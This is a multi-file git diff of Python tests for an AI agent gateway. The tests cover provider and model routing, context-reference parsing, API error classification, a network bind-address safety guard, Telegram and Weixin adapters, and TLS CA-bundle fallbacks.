# Surrogates weren't in messages — might be in system
# prompt or prefill. Fall through to normal error path.
if _is_ascii_codec:
# ASCII codec: the system encoding can't handle
# non-ASCII characters at all. Sanitize all
# non-ASCII content from messages and retry.
if _sanitize_messages_non_ascii(messages):
self._unicode_sanitization_passes += 1
self._vprint(
f"{self.log_prefix}⚠️ System encoding is ASCII — stripped non-ASCII characters from messages. Retrying...",
force=True,
)
continue
# Nothing to sanitize in messages — might be in system
# prompt or prefill. Fall through to normal error path.
status_code = getattr(api_error, "status_code", None)
error_context = self._extract_api_error_context(api_error)
@@ -12,6 +12,17 @@ def _isolate(tmp_path, monkeypatch):
hermes_home = tmp_path / ".hermes"
hermes_home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
for env_var in (
"AUXILIARY_VISION_PROVIDER",
"AUXILIARY_VISION_MODEL",
"AUXILIARY_VISION_BASE_URL",
"AUXILIARY_VISION_API_KEY",
"CONTEXT_VISION_PROVIDER",
"CONTEXT_VISION_MODEL",
"CONTEXT_VISION_BASE_URL",
"CONTEXT_VISION_API_KEY",
):
monkeypatch.delenv(env_var, raising=False)
# Write a minimal config so load_config doesn't fail
(hermes_home / "config.yaml").write_text("model:\n default: test-model\n")
@@ -149,3 +160,83 @@ class TestResolveProviderClientNamedCustom:
# "coffee" doesn't exist in custom_providers
client, model = resolve_provider_client("coffee", "test")
assert client is None
class TestResolveProviderClientModelNormalization:
"""Direct-provider auxiliary routing should normalize models like main runtime."""
def test_matching_native_prefix_is_stripped_for_main_provider(self, tmp_path):
_write_config(tmp_path, {
"model": {"default": "zai/glm-5.1", "provider": "zai"},
})
with (
patch("hermes_cli.auth.resolve_api_key_provider_credentials", return_value={
"api_key": "glm-key",
"base_url": "https://api.z.ai/api/paas/v4",
}),
patch("agent.auxiliary_client.OpenAI") as mock_openai,
):
mock_openai.return_value = MagicMock()
from agent.auxiliary_client import resolve_provider_client
client, model = resolve_provider_client("main", "zai/glm-5.1")
assert client is not None
assert model == "glm-5.1"
def test_non_matching_prefix_is_preserved_for_direct_provider(self, tmp_path):
_write_config(tmp_path, {
"model": {"default": "zai/glm-5.1", "provider": "zai"},
})
with (
patch("hermes_cli.auth.resolve_api_key_provider_credentials", return_value={
"api_key": "glm-key",
"base_url": "https://api.z.ai/api/paas/v4",
}),
patch("agent.auxiliary_client.OpenAI") as mock_openai,
):
mock_openai.return_value = MagicMock()
from agent.auxiliary_client import resolve_provider_client
client, model = resolve_provider_client("zai", "google/gemini-2.5-pro")
assert client is not None
assert model == "google/gemini-2.5-pro"
def test_aggregator_vendor_slug_is_preserved(self, monkeypatch):
monkeypatch.setenv("OPENROUTER_API_KEY", "or-key")
with patch("agent.auxiliary_client.OpenAI") as mock_openai:
mock_openai.return_value = MagicMock()
from agent.auxiliary_client import resolve_provider_client
client, model = resolve_provider_client(
"openrouter", "anthropic/claude-sonnet-4.6"
)
assert client is not None
assert model == "anthropic/claude-sonnet-4.6"
class TestResolveVisionProviderClientModelNormalization:
"""Vision auto-routing should reuse the same provider-specific normalization."""
def test_vision_auto_strips_matching_main_provider_prefix(self, tmp_path):
_write_config(tmp_path, {
"model": {"default": "zai/glm-5.1", "provider": "zai"},
})
with (
patch("agent.auxiliary_client._read_nous_auth", return_value=None),
patch("hermes_cli.auth.resolve_api_key_provider_credentials", return_value={
"api_key": "glm-key",
"base_url": "https://api.z.ai/api/paas/v4",
}),
patch("agent.auxiliary_client.OpenAI") as mock_openai,
):
mock_openai.return_value = MagicMock()
from agent.auxiliary_client import resolve_vision_provider_client
provider, client, model = resolve_vision_provider_client()
assert provider == "zai"
assert client is not None
assert model == "glm-5.1"
+42
View File
@@ -83,6 +83,24 @@ def test_parse_references_strips_trailing_punctuation():
assert refs[1].target == "https://example.com/docs"
def test_parse_quoted_references_with_spaces_and_preserve_unquoted_ranges():
from agent.context_references import parse_context_references
refs = parse_context_references(
'review @file:"C:\\Users\\Simba\\My Project\\main.py":7-9 '
'and @folder:"docs and specs" plus @file:src/main.py:1-2'
)
assert [ref.kind for ref in refs] == ["file", "folder", "file"]
assert refs[0].target == r"C:\Users\Simba\My Project\main.py"
assert refs[0].line_start == 7
assert refs[0].line_end == 9
assert refs[1].target == "docs and specs"
assert refs[2].target == "src/main.py"
assert refs[2].line_start == 1
assert refs[2].line_end == 2
def test_expand_file_range_and_folder_listing(sample_repo: Path):
from agent.context_references import preprocess_context_references
@@ -106,6 +124,30 @@ def test_expand_file_range_and_folder_listing(sample_repo: Path):
assert not result.warnings
def test_expand_quoted_file_reference_with_spaces(tmp_path: Path):
from agent.context_references import preprocess_context_references
workspace = tmp_path / "repo"
folder = workspace / "docs and specs"
folder.mkdir(parents=True)
file_path = folder / "release notes.txt"
file_path.write_text("line 1\nline 2\nline 3\n", encoding="utf-8")
result = preprocess_context_references(
'Review @file:"docs and specs/release notes.txt":2-3',
cwd=workspace,
context_length=100_000,
)
assert result.expanded
assert result.message.startswith("Review")
assert "line 1" not in result.message
assert "line 2" in result.message
assert "line 3" in result.message
assert "release notes.txt" in result.message
assert not result.warnings
def test_expand_git_diff_staged_and_log(sample_repo: Path):
from agent.context_references import preprocess_context_references
+16
View File
@@ -249,6 +249,22 @@ class TestClassifyApiError:
assert result.reason == FailoverReason.rate_limit
assert result.should_fallback is True
def test_alibaba_rate_increased_too_quickly(self):
"""Alibaba/DashScope returns a unique throttling message.
Port from anomalyco/opencode#21355.
"""
msg = (
"Upstream error from Alibaba: Request rate increased too quickly. "
"To ensure system stability, please adjust your client logic to "
"scale requests more smoothly over time."
)
e = MockAPIError(msg, status_code=400)
result = classify_api_error(e)
assert result.reason == FailoverReason.rate_limit
assert result.retryable is True
assert result.should_rotate_credential is True
# ── Server errors ──
def test_500_server_error(self):
-4
View File
@@ -105,10 +105,6 @@ class TestTelegramSlashCommands:
send_status.assert_called_once()
@pytest.mark.asyncio
@pytest.mark.xfail(
reason="Bug: _handle_provider_command references unbound model_cfg when config.yaml is absent",
strict=False,
)
async def test_provider_shows_current_provider(self, adapter):
send = await send_and_capture(adapter, "/provider")
+132
View File
@@ -0,0 +1,132 @@
"""Tests for the API server bind-address startup guard.
Validates that is_network_accessible() correctly classifies addresses and
that connect() refuses to start on non-loopback without API_SERVER_KEY.
"""
import socket
from unittest.mock import AsyncMock, patch
import pytest
from gateway.config import PlatformConfig
from gateway.platforms.api_server import APIServerAdapter
from gateway.platforms.base import is_network_accessible
# ---------------------------------------------------------------------------
# Unit tests: is_network_accessible()
# ---------------------------------------------------------------------------
class TestIsNetworkAccessible:
"""Direct tests for the address classification helper."""
# -- Loopback (safe, should return False) --
def test_ipv4_loopback(self):
assert is_network_accessible("127.0.0.1") is False
def test_ipv6_loopback(self):
assert is_network_accessible("::1") is False
def test_ipv4_mapped_loopback(self):
# ::ffff:127.0.0.1 — Python's is_loopback returns False for mapped
# addresses; the helper must unwrap and check ipv4_mapped.
assert is_network_accessible("::ffff:127.0.0.1") is False
# -- Network-accessible (should return True) --
def test_ipv4_wildcard(self):
assert is_network_accessible("0.0.0.0") is True
def test_ipv6_wildcard(self):
# This is the bypass vector that the string-based check missed.
assert is_network_accessible("::") is True
def test_ipv4_mapped_unspecified(self):
assert is_network_accessible("::ffff:0.0.0.0") is True
def test_private_ipv4(self):
assert is_network_accessible("10.0.0.1") is True
def test_private_ipv4_class_c(self):
assert is_network_accessible("192.168.1.1") is True
def test_public_ipv4(self):
assert is_network_accessible("8.8.8.8") is True
# -- Hostname resolution --
def test_localhost_resolves_to_loopback(self):
loopback_result = [
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("127.0.0.1", 0)),
]
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=loopback_result):
assert is_network_accessible("localhost") is False
def test_hostname_resolving_to_non_loopback(self):
non_loopback_result = [
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("10.0.0.1", 0)),
]
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=non_loopback_result):
assert is_network_accessible("my-server.local") is True
def test_hostname_mixed_resolution(self):
"""If a hostname resolves to both loopback and non-loopback, it's
network-accessible (any non-loopback address is enough)."""
mixed_result = [
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("127.0.0.1", 0)),
(socket.AF_INET, socket.SOCK_STREAM, 0, "", ("10.0.0.1", 0)),
]
with patch("gateway.platforms.base._socket.getaddrinfo", return_value=mixed_result):
assert is_network_accessible("dual-host.local") is True
def test_dns_failure_fails_closed(self):
"""Unresolvable hostnames should require an API key (fail closed)."""
with patch(
"gateway.platforms.base._socket.getaddrinfo",
side_effect=socket.gaierror("Name resolution failed"),
):
assert is_network_accessible("nonexistent.invalid") is True
# ---------------------------------------------------------------------------
# Integration tests: connect() startup guard
# ---------------------------------------------------------------------------
class TestConnectBindGuard:
"""Verify that connect() refuses dangerous configurations."""
@pytest.mark.asyncio
async def test_refuses_ipv4_wildcard_without_key(self):
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "0.0.0.0"}))
result = await adapter.connect()
assert result is False
@pytest.mark.asyncio
async def test_refuses_ipv6_wildcard_without_key(self):
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "::"}))
result = await adapter.connect()
assert result is False
def test_allows_loopback_without_key(self):
"""Loopback with no key should pass the guard."""
adapter = APIServerAdapter(PlatformConfig(enabled=True, extra={"host": "127.0.0.1"}))
assert adapter._api_key == ""
# The guard condition: is_network_accessible(host) AND NOT api_key
# For loopback, is_network_accessible is False so the guard does not block.
assert is_network_accessible(adapter._host) is False
@pytest.mark.asyncio
async def test_allows_wildcard_with_key(self):
"""Non-loopback with a key should pass the guard."""
adapter = APIServerAdapter(
PlatformConfig(enabled=True, extra={"host": "0.0.0.0", "key": "sk-test"})
)
# The guard checks: is_network_accessible(host) AND NOT api_key
# With a key set, the guard should not block.
assert adapter._api_key == "sk-test"
assert is_network_accessible("0.0.0.0") is True
# Combined: the guard condition is False (key is set), so it passes
+191
View File
@@ -0,0 +1,191 @@
"""Tests for gateway /fast support and Priority Processing routing."""
import sys
import threading
import types
from types import SimpleNamespace
from unittest.mock import AsyncMock, patch
import pytest
import yaml
import gateway.run as gateway_run
from gateway.config import Platform
from gateway.platforms.base import MessageEvent
from gateway.session import SessionSource
class _CapturingAgent:
last_init = None
last_run = None
def __init__(self, *args, **kwargs):
type(self).last_init = dict(kwargs)
self.tools = []
def run_conversation(self, user_message, conversation_history=None, task_id=None, persist_user_message=None):
type(self).last_run = {
"user_message": user_message,
"conversation_history": conversation_history,
"task_id": task_id,
"persist_user_message": persist_user_message,
}
return {
"final_response": "ok",
"messages": [],
"api_calls": 1,
"completed": True,
}
def _install_fake_agent(monkeypatch):
fake_run_agent = types.ModuleType("run_agent")
fake_run_agent.AIAgent = _CapturingAgent
monkeypatch.setitem(sys.modules, "run_agent", fake_run_agent)
def _make_runner():
runner = object.__new__(gateway_run.GatewayRunner)
runner.adapters = {}
runner._ephemeral_system_prompt = ""
runner._prefill_messages = []
runner._reasoning_config = None
runner._service_tier = None
runner._provider_routing = {}
runner._fallback_model = None
runner._smart_model_routing = {}
runner._running_agents = {}
runner._pending_model_notes = {}
runner._session_db = None
runner._agent_cache = {}
runner._agent_cache_lock = threading.Lock()
runner._session_model_overrides = {}
runner.hooks = SimpleNamespace(loaded_hooks=False)
runner.config = SimpleNamespace(streaming=None)
runner.session_store = SimpleNamespace(
get_or_create_session=lambda source: SimpleNamespace(session_id="session-1"),
load_transcript=lambda session_id: [],
)
runner._get_or_create_gateway_honcho = lambda session_key: (None, None)
runner._enrich_message_with_vision = AsyncMock(return_value="ENRICHED")
return runner
def _make_source() -> SessionSource:
return SessionSource(
platform=Platform.TELEGRAM,
chat_id="12345",
chat_type="dm",
user_id="user-1",
)
def _make_event(text: str) -> MessageEvent:
return MessageEvent(text=text, source=_make_source(), message_id="m1")
def test_turn_route_injects_priority_processing_without_changing_runtime():
runner = _make_runner()
runner._service_tier = "priority"
runtime_kwargs = {
"api_key": "***",
"base_url": "https://openrouter.ai/api/v1",
"provider": "openrouter",
"api_mode": "chat_completions",
"command": None,
"args": [],
"credential_pool": None,
}
with patch("agent.smart_model_routing.resolve_turn_route", return_value={
"model": "gpt-5.4",
"runtime": dict(runtime_kwargs),
"label": None,
"signature": ("gpt-5.4", "openrouter", "https://openrouter.ai/api/v1", "chat_completions", None, ()),
}):
route = gateway_run.GatewayRunner._resolve_turn_agent_config(runner, "hi", "gpt-5.4", runtime_kwargs)
assert route["runtime"]["provider"] == "openrouter"
assert route["runtime"]["api_mode"] == "chat_completions"
assert route["request_overrides"] == {"service_tier": "priority"}
def test_turn_route_skips_priority_processing_for_unsupported_models():
runner = _make_runner()
runner._service_tier = "priority"
runtime_kwargs = {
"api_key": "***",
"base_url": "https://openrouter.ai/api/v1",
"provider": "openrouter",
"api_mode": "chat_completions",
"command": None,
"args": [],
"credential_pool": None,
}
with patch("agent.smart_model_routing.resolve_turn_route", return_value={
"model": "gpt-5.3-codex",
"runtime": dict(runtime_kwargs),
"label": None,
"signature": ("gpt-5.3-codex", "openrouter", "https://openrouter.ai/api/v1", "chat_completions", None, ()),
}):
route = gateway_run.GatewayRunner._resolve_turn_agent_config(runner, "hi", "gpt-5.3-codex", runtime_kwargs)
assert route["request_overrides"] is None
@pytest.mark.asyncio
async def test_handle_fast_command_persists_config(monkeypatch, tmp_path):
runner = _make_runner()
monkeypatch.setattr(gateway_run, "_hermes_home", tmp_path)
monkeypatch.setattr(gateway_run, "_load_gateway_config", lambda: {})
monkeypatch.setattr(gateway_run, "_resolve_gateway_model", lambda config=None: "gpt-5.4")
response = await runner._handle_fast_command(_make_event("/fast fast"))
assert "FAST" in response
assert runner._service_tier == "priority"
saved = yaml.safe_load((tmp_path / "config.yaml").read_text(encoding="utf-8"))
assert saved["agent"]["service_tier"] == "fast"
@pytest.mark.asyncio
async def test_run_agent_passes_priority_processing_to_gateway_agent(monkeypatch, tmp_path):
_install_fake_agent(monkeypatch)
runner = _make_runner()
(tmp_path / "config.yaml").write_text("agent:\n service_tier: fast\n", encoding="utf-8")
monkeypatch.setattr(gateway_run, "_hermes_home", tmp_path)
monkeypatch.setattr(gateway_run, "_env_path", tmp_path / ".env")
monkeypatch.setattr(gateway_run, "load_dotenv", lambda *args, **kwargs: None)
monkeypatch.setattr(gateway_run, "_load_gateway_config", lambda: {})
monkeypatch.setattr(gateway_run, "_resolve_gateway_model", lambda config=None: "gpt-5.4")
monkeypatch.setattr(
gateway_run,
"_resolve_runtime_agent_kwargs",
lambda: {
"provider": "openrouter",
"api_mode": "chat_completions",
"base_url": "https://openrouter.ai/api/v1",
"api_key": "***",
},
)
import hermes_cli.tools_config as tools_config
monkeypatch.setattr(tools_config, "_get_platform_tools", lambda user_config, platform_key: {"core"})
_CapturingAgent.last_init = None
result = await runner._run_agent(
message="hi",
context_prompt="",
history=[],
source=_make_source(),
session_id="session-1",
session_key="agent:main:telegram:dm:12345",
)
assert result["final_response"] == "ok"
assert _CapturingAgent.last_init["service_tier"] == "priority"
assert _CapturingAgent.last_init["request_overrides"] == {"service_tier": "priority"}
+4 -4
View File
@@ -175,7 +175,7 @@ async def test_on_processing_start_handles_missing_ids(monkeypatch):
@pytest.mark.asyncio
async def test_on_processing_complete_success(monkeypatch):
"""Successful processing should set check mark reaction."""
"""Successful processing should set thumbs-up reaction."""
monkeypatch.setenv("TELEGRAM_REACTIONS", "true")
adapter = _make_adapter()
event = _make_event()
@@ -185,13 +185,13 @@ async def test_on_processing_complete_success(monkeypatch):
adapter._bot.set_message_reaction.assert_awaited_once_with(
chat_id=123,
message_id=456,
reaction="\u2705",
reaction="\U0001f44d",
)
@pytest.mark.asyncio
async def test_on_processing_complete_failure(monkeypatch):
"""Failed processing should set cross mark reaction."""
"""Failed processing should set thumbs-down reaction."""
monkeypatch.setenv("TELEGRAM_REACTIONS", "true")
adapter = _make_adapter()
event = _make_event()
@@ -201,7 +201,7 @@ async def test_on_processing_complete_failure(monkeypatch):
adapter._bot.set_message_reaction.assert_awaited_once_with(
chat_id=123,
message_id=456,
reaction="\u274c",
reaction="\U0001f44e",
)
+214
View File
@@ -0,0 +1,214 @@
"""Tests for the Weixin platform adapter."""
import asyncio
import os
from unittest.mock import AsyncMock, patch
from gateway.config import PlatformConfig
from gateway.config import GatewayConfig, HomeChannel, Platform, _apply_env_overrides
from gateway.platforms.weixin import WeixinAdapter
from tools.send_message_tool import _parse_target_ref, _send_to_platform
def _make_adapter() -> WeixinAdapter:
return WeixinAdapter(
PlatformConfig(
enabled=True,
token="test-token",
extra={"account_id": "test-account"},
)
)
class TestWeixinFormatting:
def test_format_message_preserves_markdown_and_rewrites_headers(self):
adapter = _make_adapter()
content = "# Title\n\n## Plan\n\nUse **bold** and [docs](https://example.com)."
assert (
adapter.format_message(content)
== "【Title】\n\n**Plan**\n\nUse **bold** and [docs](https://example.com)."
)
def test_format_message_rewrites_markdown_tables(self):
adapter = _make_adapter()
content = (
"| Setting | Value |\n"
"| --- | --- |\n"
"| Timeout | 30s |\n"
"| Retries | 3 |\n"
)
assert adapter.format_message(content) == (
"- Setting: Timeout\n"
" Value: 30s\n"
"- Setting: Retries\n"
" Value: 3"
)
def test_format_message_preserves_fenced_code_blocks(self):
adapter = _make_adapter()
content = "## Snippet\n\n```python\nprint('hi')\n```"
assert adapter.format_message(content) == "**Snippet**\n\n```python\nprint('hi')\n```"
def test_format_message_returns_empty_string_for_none(self):
adapter = _make_adapter()
assert adapter.format_message(None) == ""
class TestWeixinChunking:
def test_split_text_sends_top_level_newlines_as_separate_messages(self):
adapter = _make_adapter()
content = adapter.format_message("第一行\n第二行\n第三行")
chunks = adapter._split_text(content)
assert chunks == ["第一行", "第二行", "第三行"]
def test_split_text_keeps_indented_followup_with_previous_line(self):
adapter = _make_adapter()
content = adapter.format_message(
"| Setting | Value |\n"
"| --- | --- |\n"
"| Timeout | 30s |\n"
"| Retries | 3 |\n"
)
chunks = adapter._split_text(content)
assert chunks == [
"- Setting: Timeout\n Value: 30s",
"- Setting: Retries\n Value: 3",
]
def test_split_text_keeps_complete_code_block_together_when_possible(self):
adapter = _make_adapter()
adapter.MAX_MESSAGE_LENGTH = 80
content = adapter.format_message(
"## Intro\n\nShort paragraph.\n\n```python\nprint('hello world')\nprint('again')\n```\n\nTail paragraph."
)
chunks = adapter._split_text(content)
assert len(chunks) >= 2
assert any(
"```python\nprint('hello world')\nprint('again')\n```" in chunk
for chunk in chunks
)
assert all(chunk.count("```") % 2 == 0 for chunk in chunks)
def test_split_text_safely_splits_long_code_blocks(self):
adapter = _make_adapter()
adapter.MAX_MESSAGE_LENGTH = 70
lines = "\n".join(f"line_{idx:02d} = {idx}" for idx in range(10))
content = adapter.format_message(f"```python\n{lines}\n```")
chunks = adapter._split_text(content)
assert len(chunks) > 1
assert all(len(chunk) <= adapter.MAX_MESSAGE_LENGTH for chunk in chunks)
assert all(chunk.count("```") >= 2 for chunk in chunks)
class TestWeixinConfig:
def test_apply_env_overrides_configures_weixin(self):
config = GatewayConfig()
with patch.dict(
os.environ,
{
"WEIXIN_ACCOUNT_ID": "bot-account",
"WEIXIN_TOKEN": "bot-token",
"WEIXIN_BASE_URL": "https://ilink.example.com/",
"WEIXIN_CDN_BASE_URL": "https://cdn.example.com/c2c/",
"WEIXIN_DM_POLICY": "allowlist",
"WEIXIN_ALLOWED_USERS": "wxid_1,wxid_2",
"WEIXIN_HOME_CHANNEL": "wxid_1",
"WEIXIN_HOME_CHANNEL_NAME": "Primary DM",
},
clear=True,
):
_apply_env_overrides(config)
platform_config = config.platforms[Platform.WEIXIN]
assert platform_config.enabled is True
assert platform_config.token == "bot-token"
assert platform_config.extra["account_id"] == "bot-account"
assert platform_config.extra["base_url"] == "https://ilink.example.com"
assert platform_config.extra["cdn_base_url"] == "https://cdn.example.com/c2c"
assert platform_config.extra["dm_policy"] == "allowlist"
assert platform_config.extra["allow_from"] == "wxid_1,wxid_2"
assert platform_config.home_channel == HomeChannel(Platform.WEIXIN, "wxid_1", "Primary DM")
def test_get_connected_platforms_includes_weixin_with_token(self):
config = GatewayConfig(
platforms={
Platform.WEIXIN: PlatformConfig(
enabled=True,
token="bot-token",
extra={"account_id": "bot-account"},
)
}
)
assert config.get_connected_platforms() == [Platform.WEIXIN]
def test_get_connected_platforms_requires_account_id(self):
config = GatewayConfig(
platforms={
Platform.WEIXIN: PlatformConfig(
enabled=True,
token="bot-token",
)
}
)
assert config.get_connected_platforms() == []
class TestWeixinSendMessageIntegration:
def test_parse_target_ref_accepts_weixin_ids(self):
assert _parse_target_ref("weixin", "wxid_test123") == ("wxid_test123", None, True)
assert _parse_target_ref("weixin", "filehelper") == ("filehelper", None, True)
assert _parse_target_ref("weixin", "group@chatroom") == ("group@chatroom", None, True)
@patch("tools.send_message_tool._send_weixin", new_callable=AsyncMock)
def test_send_to_platform_routes_weixin_media_to_native_helper(self, send_weixin_mock):
send_weixin_mock.return_value = {"success": True, "platform": "weixin", "chat_id": "wxid_test123"}
config = PlatformConfig(enabled=True, token="bot-token", extra={"account_id": "bot-account"})
result = asyncio.run(
_send_to_platform(
Platform.WEIXIN,
config,
"wxid_test123",
"hello",
media_files=[("/tmp/demo.png", False)],
)
)
assert result["success"] is True
send_weixin_mock.assert_awaited_once_with(
config,
"wxid_test123",
"hello",
media_files=[("/tmp/demo.png", False)],
)
class TestWeixinRemoteMediaSafety:
def test_download_remote_media_blocks_unsafe_urls(self):
adapter = _make_adapter()
with patch("tools.url_safety.is_safe_url", return_value=False):
try:
asyncio.run(adapter._download_remote_media("http://127.0.0.1/private.png"))
except ValueError as exc:
assert "Blocked unsafe URL" in str(exc)
else:
raise AssertionError("expected ValueError for unsafe URL")
@@ -40,6 +40,7 @@ class TestProviderRegistry:
("copilot", "GitHub Copilot", "api_key"),
("huggingface", "Hugging Face", "api_key"),
("zai", "Z.AI / GLM", "api_key"),
("xai", "xAI", "api_key"),
("kimi-coding", "Kimi / Moonshot", "api_key"),
("minimax", "MiniMax", "api_key"),
("minimax-cn", "MiniMax (China)", "api_key"),
@@ -58,6 +59,12 @@ class TestProviderRegistry:
assert pconfig.api_key_env_vars == ("GLM_API_KEY", "ZAI_API_KEY", "Z_AI_API_KEY")
assert pconfig.base_url_env_var == "GLM_BASE_URL"
def test_xai_env_vars(self):
pconfig = PROVIDER_REGISTRY["xai"]
assert pconfig.api_key_env_vars == ("XAI_API_KEY",)
assert pconfig.base_url_env_var == "XAI_BASE_URL"
assert pconfig.inference_base_url == "https://api.x.ai/v1"
def test_copilot_env_vars(self):
pconfig = PROVIDER_REGISTRY["copilot"]
assert pconfig.api_key_env_vars == ("COPILOT_GITHUB_TOKEN", "GH_TOKEN", "GITHUB_TOKEN")
@@ -1,6 +1,7 @@
"""Regression tests for Nous OAuth refresh + agent-key mint interactions."""
import json
import os
from datetime import datetime, timezone
from pathlib import Path
@@ -10,6 +11,80 @@ import pytest
from hermes_cli.auth import AuthError, get_provider_auth_state, resolve_nous_runtime_credentials
# =============================================================================
# _resolve_verify: CA bundle path validation
# =============================================================================
class TestResolveVerifyFallback:
"""Verify _resolve_verify falls back to True when CA bundle path doesn't exist."""
def test_missing_ca_bundle_in_auth_state_falls_back(self):
from hermes_cli.auth import _resolve_verify
result = _resolve_verify(auth_state={
"tls": {"insecure": False, "ca_bundle": "/nonexistent/ca-bundle.pem"},
})
assert result is True
def test_valid_ca_bundle_in_auth_state_is_returned(self, tmp_path):
from hermes_cli.auth import _resolve_verify
ca_file = tmp_path / "ca-bundle.pem"
ca_file.write_text("fake cert")
result = _resolve_verify(auth_state={
"tls": {"insecure": False, "ca_bundle": str(ca_file)},
})
assert result == str(ca_file)
def test_missing_ssl_cert_file_env_falls_back(self, monkeypatch):
from hermes_cli.auth import _resolve_verify
monkeypatch.setenv("SSL_CERT_FILE", "/nonexistent/ssl-cert.pem")
monkeypatch.delenv("HERMES_CA_BUNDLE", raising=False)
result = _resolve_verify(auth_state={"tls": {}})
assert result is True
def test_missing_hermes_ca_bundle_env_falls_back(self, monkeypatch):
from hermes_cli.auth import _resolve_verify
monkeypatch.setenv("HERMES_CA_BUNDLE", "/nonexistent/hermes-ca.pem")
monkeypatch.delenv("SSL_CERT_FILE", raising=False)
result = _resolve_verify(auth_state={"tls": {}})
assert result is True
def test_insecure_takes_precedence_over_missing_ca(self):
from hermes_cli.auth import _resolve_verify
result = _resolve_verify(
insecure=True,
auth_state={"tls": {"ca_bundle": "/nonexistent/ca.pem"}},
)
assert result is False
def test_no_ca_bundle_returns_true(self, monkeypatch):
from hermes_cli.auth import _resolve_verify
monkeypatch.delenv("HERMES_CA_BUNDLE", raising=False)
monkeypatch.delenv("SSL_CERT_FILE", raising=False)
result = _resolve_verify(auth_state={"tls": {}})
assert result is True
def test_explicit_ca_bundle_param_missing_falls_back(self):
from hermes_cli.auth import _resolve_verify
result = _resolve_verify(ca_bundle="/nonexistent/explicit-ca.pem")
assert result is True
def test_explicit_ca_bundle_param_valid_is_returned(self, tmp_path):
from hermes_cli.auth import _resolve_verify
ca_file = tmp_path / "explicit-ca.pem"
ca_file.write_text("fake cert")
result = _resolve_verify(ca_bundle=str(ca_file))
assert result == str(ca_file)
def _setup_nous_auth(
hermes_home: Path,
*,
+6
View File
@@ -150,6 +150,12 @@ class TestNormalizeModelForProvider:
assert changed is False
assert cli.model == "gpt-5.4"
def test_native_provider_prefix_is_stripped_before_agent_startup(self):
cli = _make_cli(model="zai/glm-5.1")
changed = cli._normalize_model_for_provider("zai")
assert changed is True
assert cli.model == "glm-5.1"
def test_bare_codex_model_passes_through(self):
cli = _make_cli(model="gpt-5.3-codex")
changed = cli._normalize_model_for_provider("openai-codex")
@@ -0,0 +1,124 @@
"""Tests that `hermes model` always shows the model selection menu for custom
providers, even when a model is already saved.
Regression test for the bug where _model_flow_named_custom() returned
immediately when provider_info had a saved ``model`` field, making it
impossible to switch models on multi-model endpoints.
"""
import os
from unittest.mock import patch, MagicMock, call
import pytest
@pytest.fixture
def config_home(tmp_path, monkeypatch):
"""Isolated HERMES_HOME with a minimal config."""
home = tmp_path / "hermes"
home.mkdir()
config_yaml = home / "config.yaml"
config_yaml.write_text("model: old-model\ncustom_providers: []\n")
env_file = home / ".env"
env_file.write_text("")
monkeypatch.setenv("HERMES_HOME", str(home))
monkeypatch.delenv("HERMES_MODEL", raising=False)
monkeypatch.delenv("LLM_MODEL", raising=False)
monkeypatch.delenv("HERMES_INFERENCE_PROVIDER", raising=False)
monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
monkeypatch.delenv("OPENAI_API_KEY", raising=False)
return home
class TestCustomProviderModelSwitch:
"""Ensure _model_flow_named_custom always probes and shows menu."""
def test_saved_model_still_probes_endpoint(self, config_home):
"""When a model is already saved, the function must still call
fetch_api_models to probe the endpoint not skip with early return."""
from hermes_cli.main import _model_flow_named_custom
provider_info = {
"name": "My vLLM",
"base_url": "https://vllm.example.com/v1",
"api_key": "sk-test",
"model": "model-A", # already saved
}
with patch("hermes_cli.models.fetch_api_models", return_value=["model-A", "model-B"]) as mock_fetch, \
patch.dict("sys.modules", {"simple_term_menu": None}), \
patch("builtins.input", return_value="2"), \
patch("builtins.print"):
_model_flow_named_custom({}, provider_info)
# fetch_api_models MUST be called even though model was saved
mock_fetch.assert_called_once_with("sk-test", "https://vllm.example.com/v1", timeout=8.0)
def test_can_switch_to_different_model(self, config_home):
"""User selects a different model than the saved one."""
import yaml
from hermes_cli.main import _model_flow_named_custom
provider_info = {
"name": "My vLLM",
"base_url": "https://vllm.example.com/v1",
"api_key": "sk-test",
"model": "model-A",
}
with patch("hermes_cli.models.fetch_api_models", return_value=["model-A", "model-B"]), \
patch.dict("sys.modules", {"simple_term_menu": None}), \
patch("builtins.input", return_value="2"), \
patch("builtins.print"):
_model_flow_named_custom({}, provider_info)
config = yaml.safe_load((config_home / "config.yaml").read_text()) or {}
model = config.get("model")
assert isinstance(model, dict)
assert model["default"] == "model-B"
def test_probe_failure_falls_back_to_saved(self, config_home):
"""When endpoint probe fails and user presses Enter, saved model is used."""
import yaml
from hermes_cli.main import _model_flow_named_custom
provider_info = {
"name": "My vLLM",
"base_url": "https://vllm.example.com/v1",
"api_key": "sk-test",
"model": "model-A",
}
# fetch returns empty list (probe failed), user presses Enter (empty input)
with patch("hermes_cli.models.fetch_api_models", return_value=[]), \
patch("builtins.input", return_value=""), \
patch("builtins.print"):
_model_flow_named_custom({}, provider_info)
config = yaml.safe_load((config_home / "config.yaml").read_text()) or {}
model = config.get("model")
assert isinstance(model, dict)
assert model["default"] == "model-A"
def test_no_saved_model_still_works(self, config_home):
"""First-time flow (no saved model) still works as before."""
import yaml
from hermes_cli.main import _model_flow_named_custom
provider_info = {
"name": "My vLLM",
"base_url": "https://vllm.example.com/v1",
"api_key": "sk-test",
# no "model" key
}
with patch("hermes_cli.models.fetch_api_models", return_value=["model-X"]), \
patch.dict("sys.modules", {"simple_term_menu": None}), \
patch("builtins.input", return_value="1"), \
patch("builtins.print"):
_model_flow_named_custom({}, provider_info)
config = yaml.safe_load((config_home / "config.yaml").read_text()) or {}
model = config.get("model")
assert isinstance(model, dict)
assert model["default"] == "model-X"
+5
View File
@@ -755,6 +755,7 @@ class TestProfileArg:
hermes_home = tmp_path / ".hermes"
hermes_home.mkdir()
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
result = gateway_cli._profile_arg(str(hermes_home))
assert result == ""
@@ -763,6 +764,7 @@ class TestProfileArg:
profile_dir = tmp_path / ".hermes" / "profiles" / "mybot"
profile_dir.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
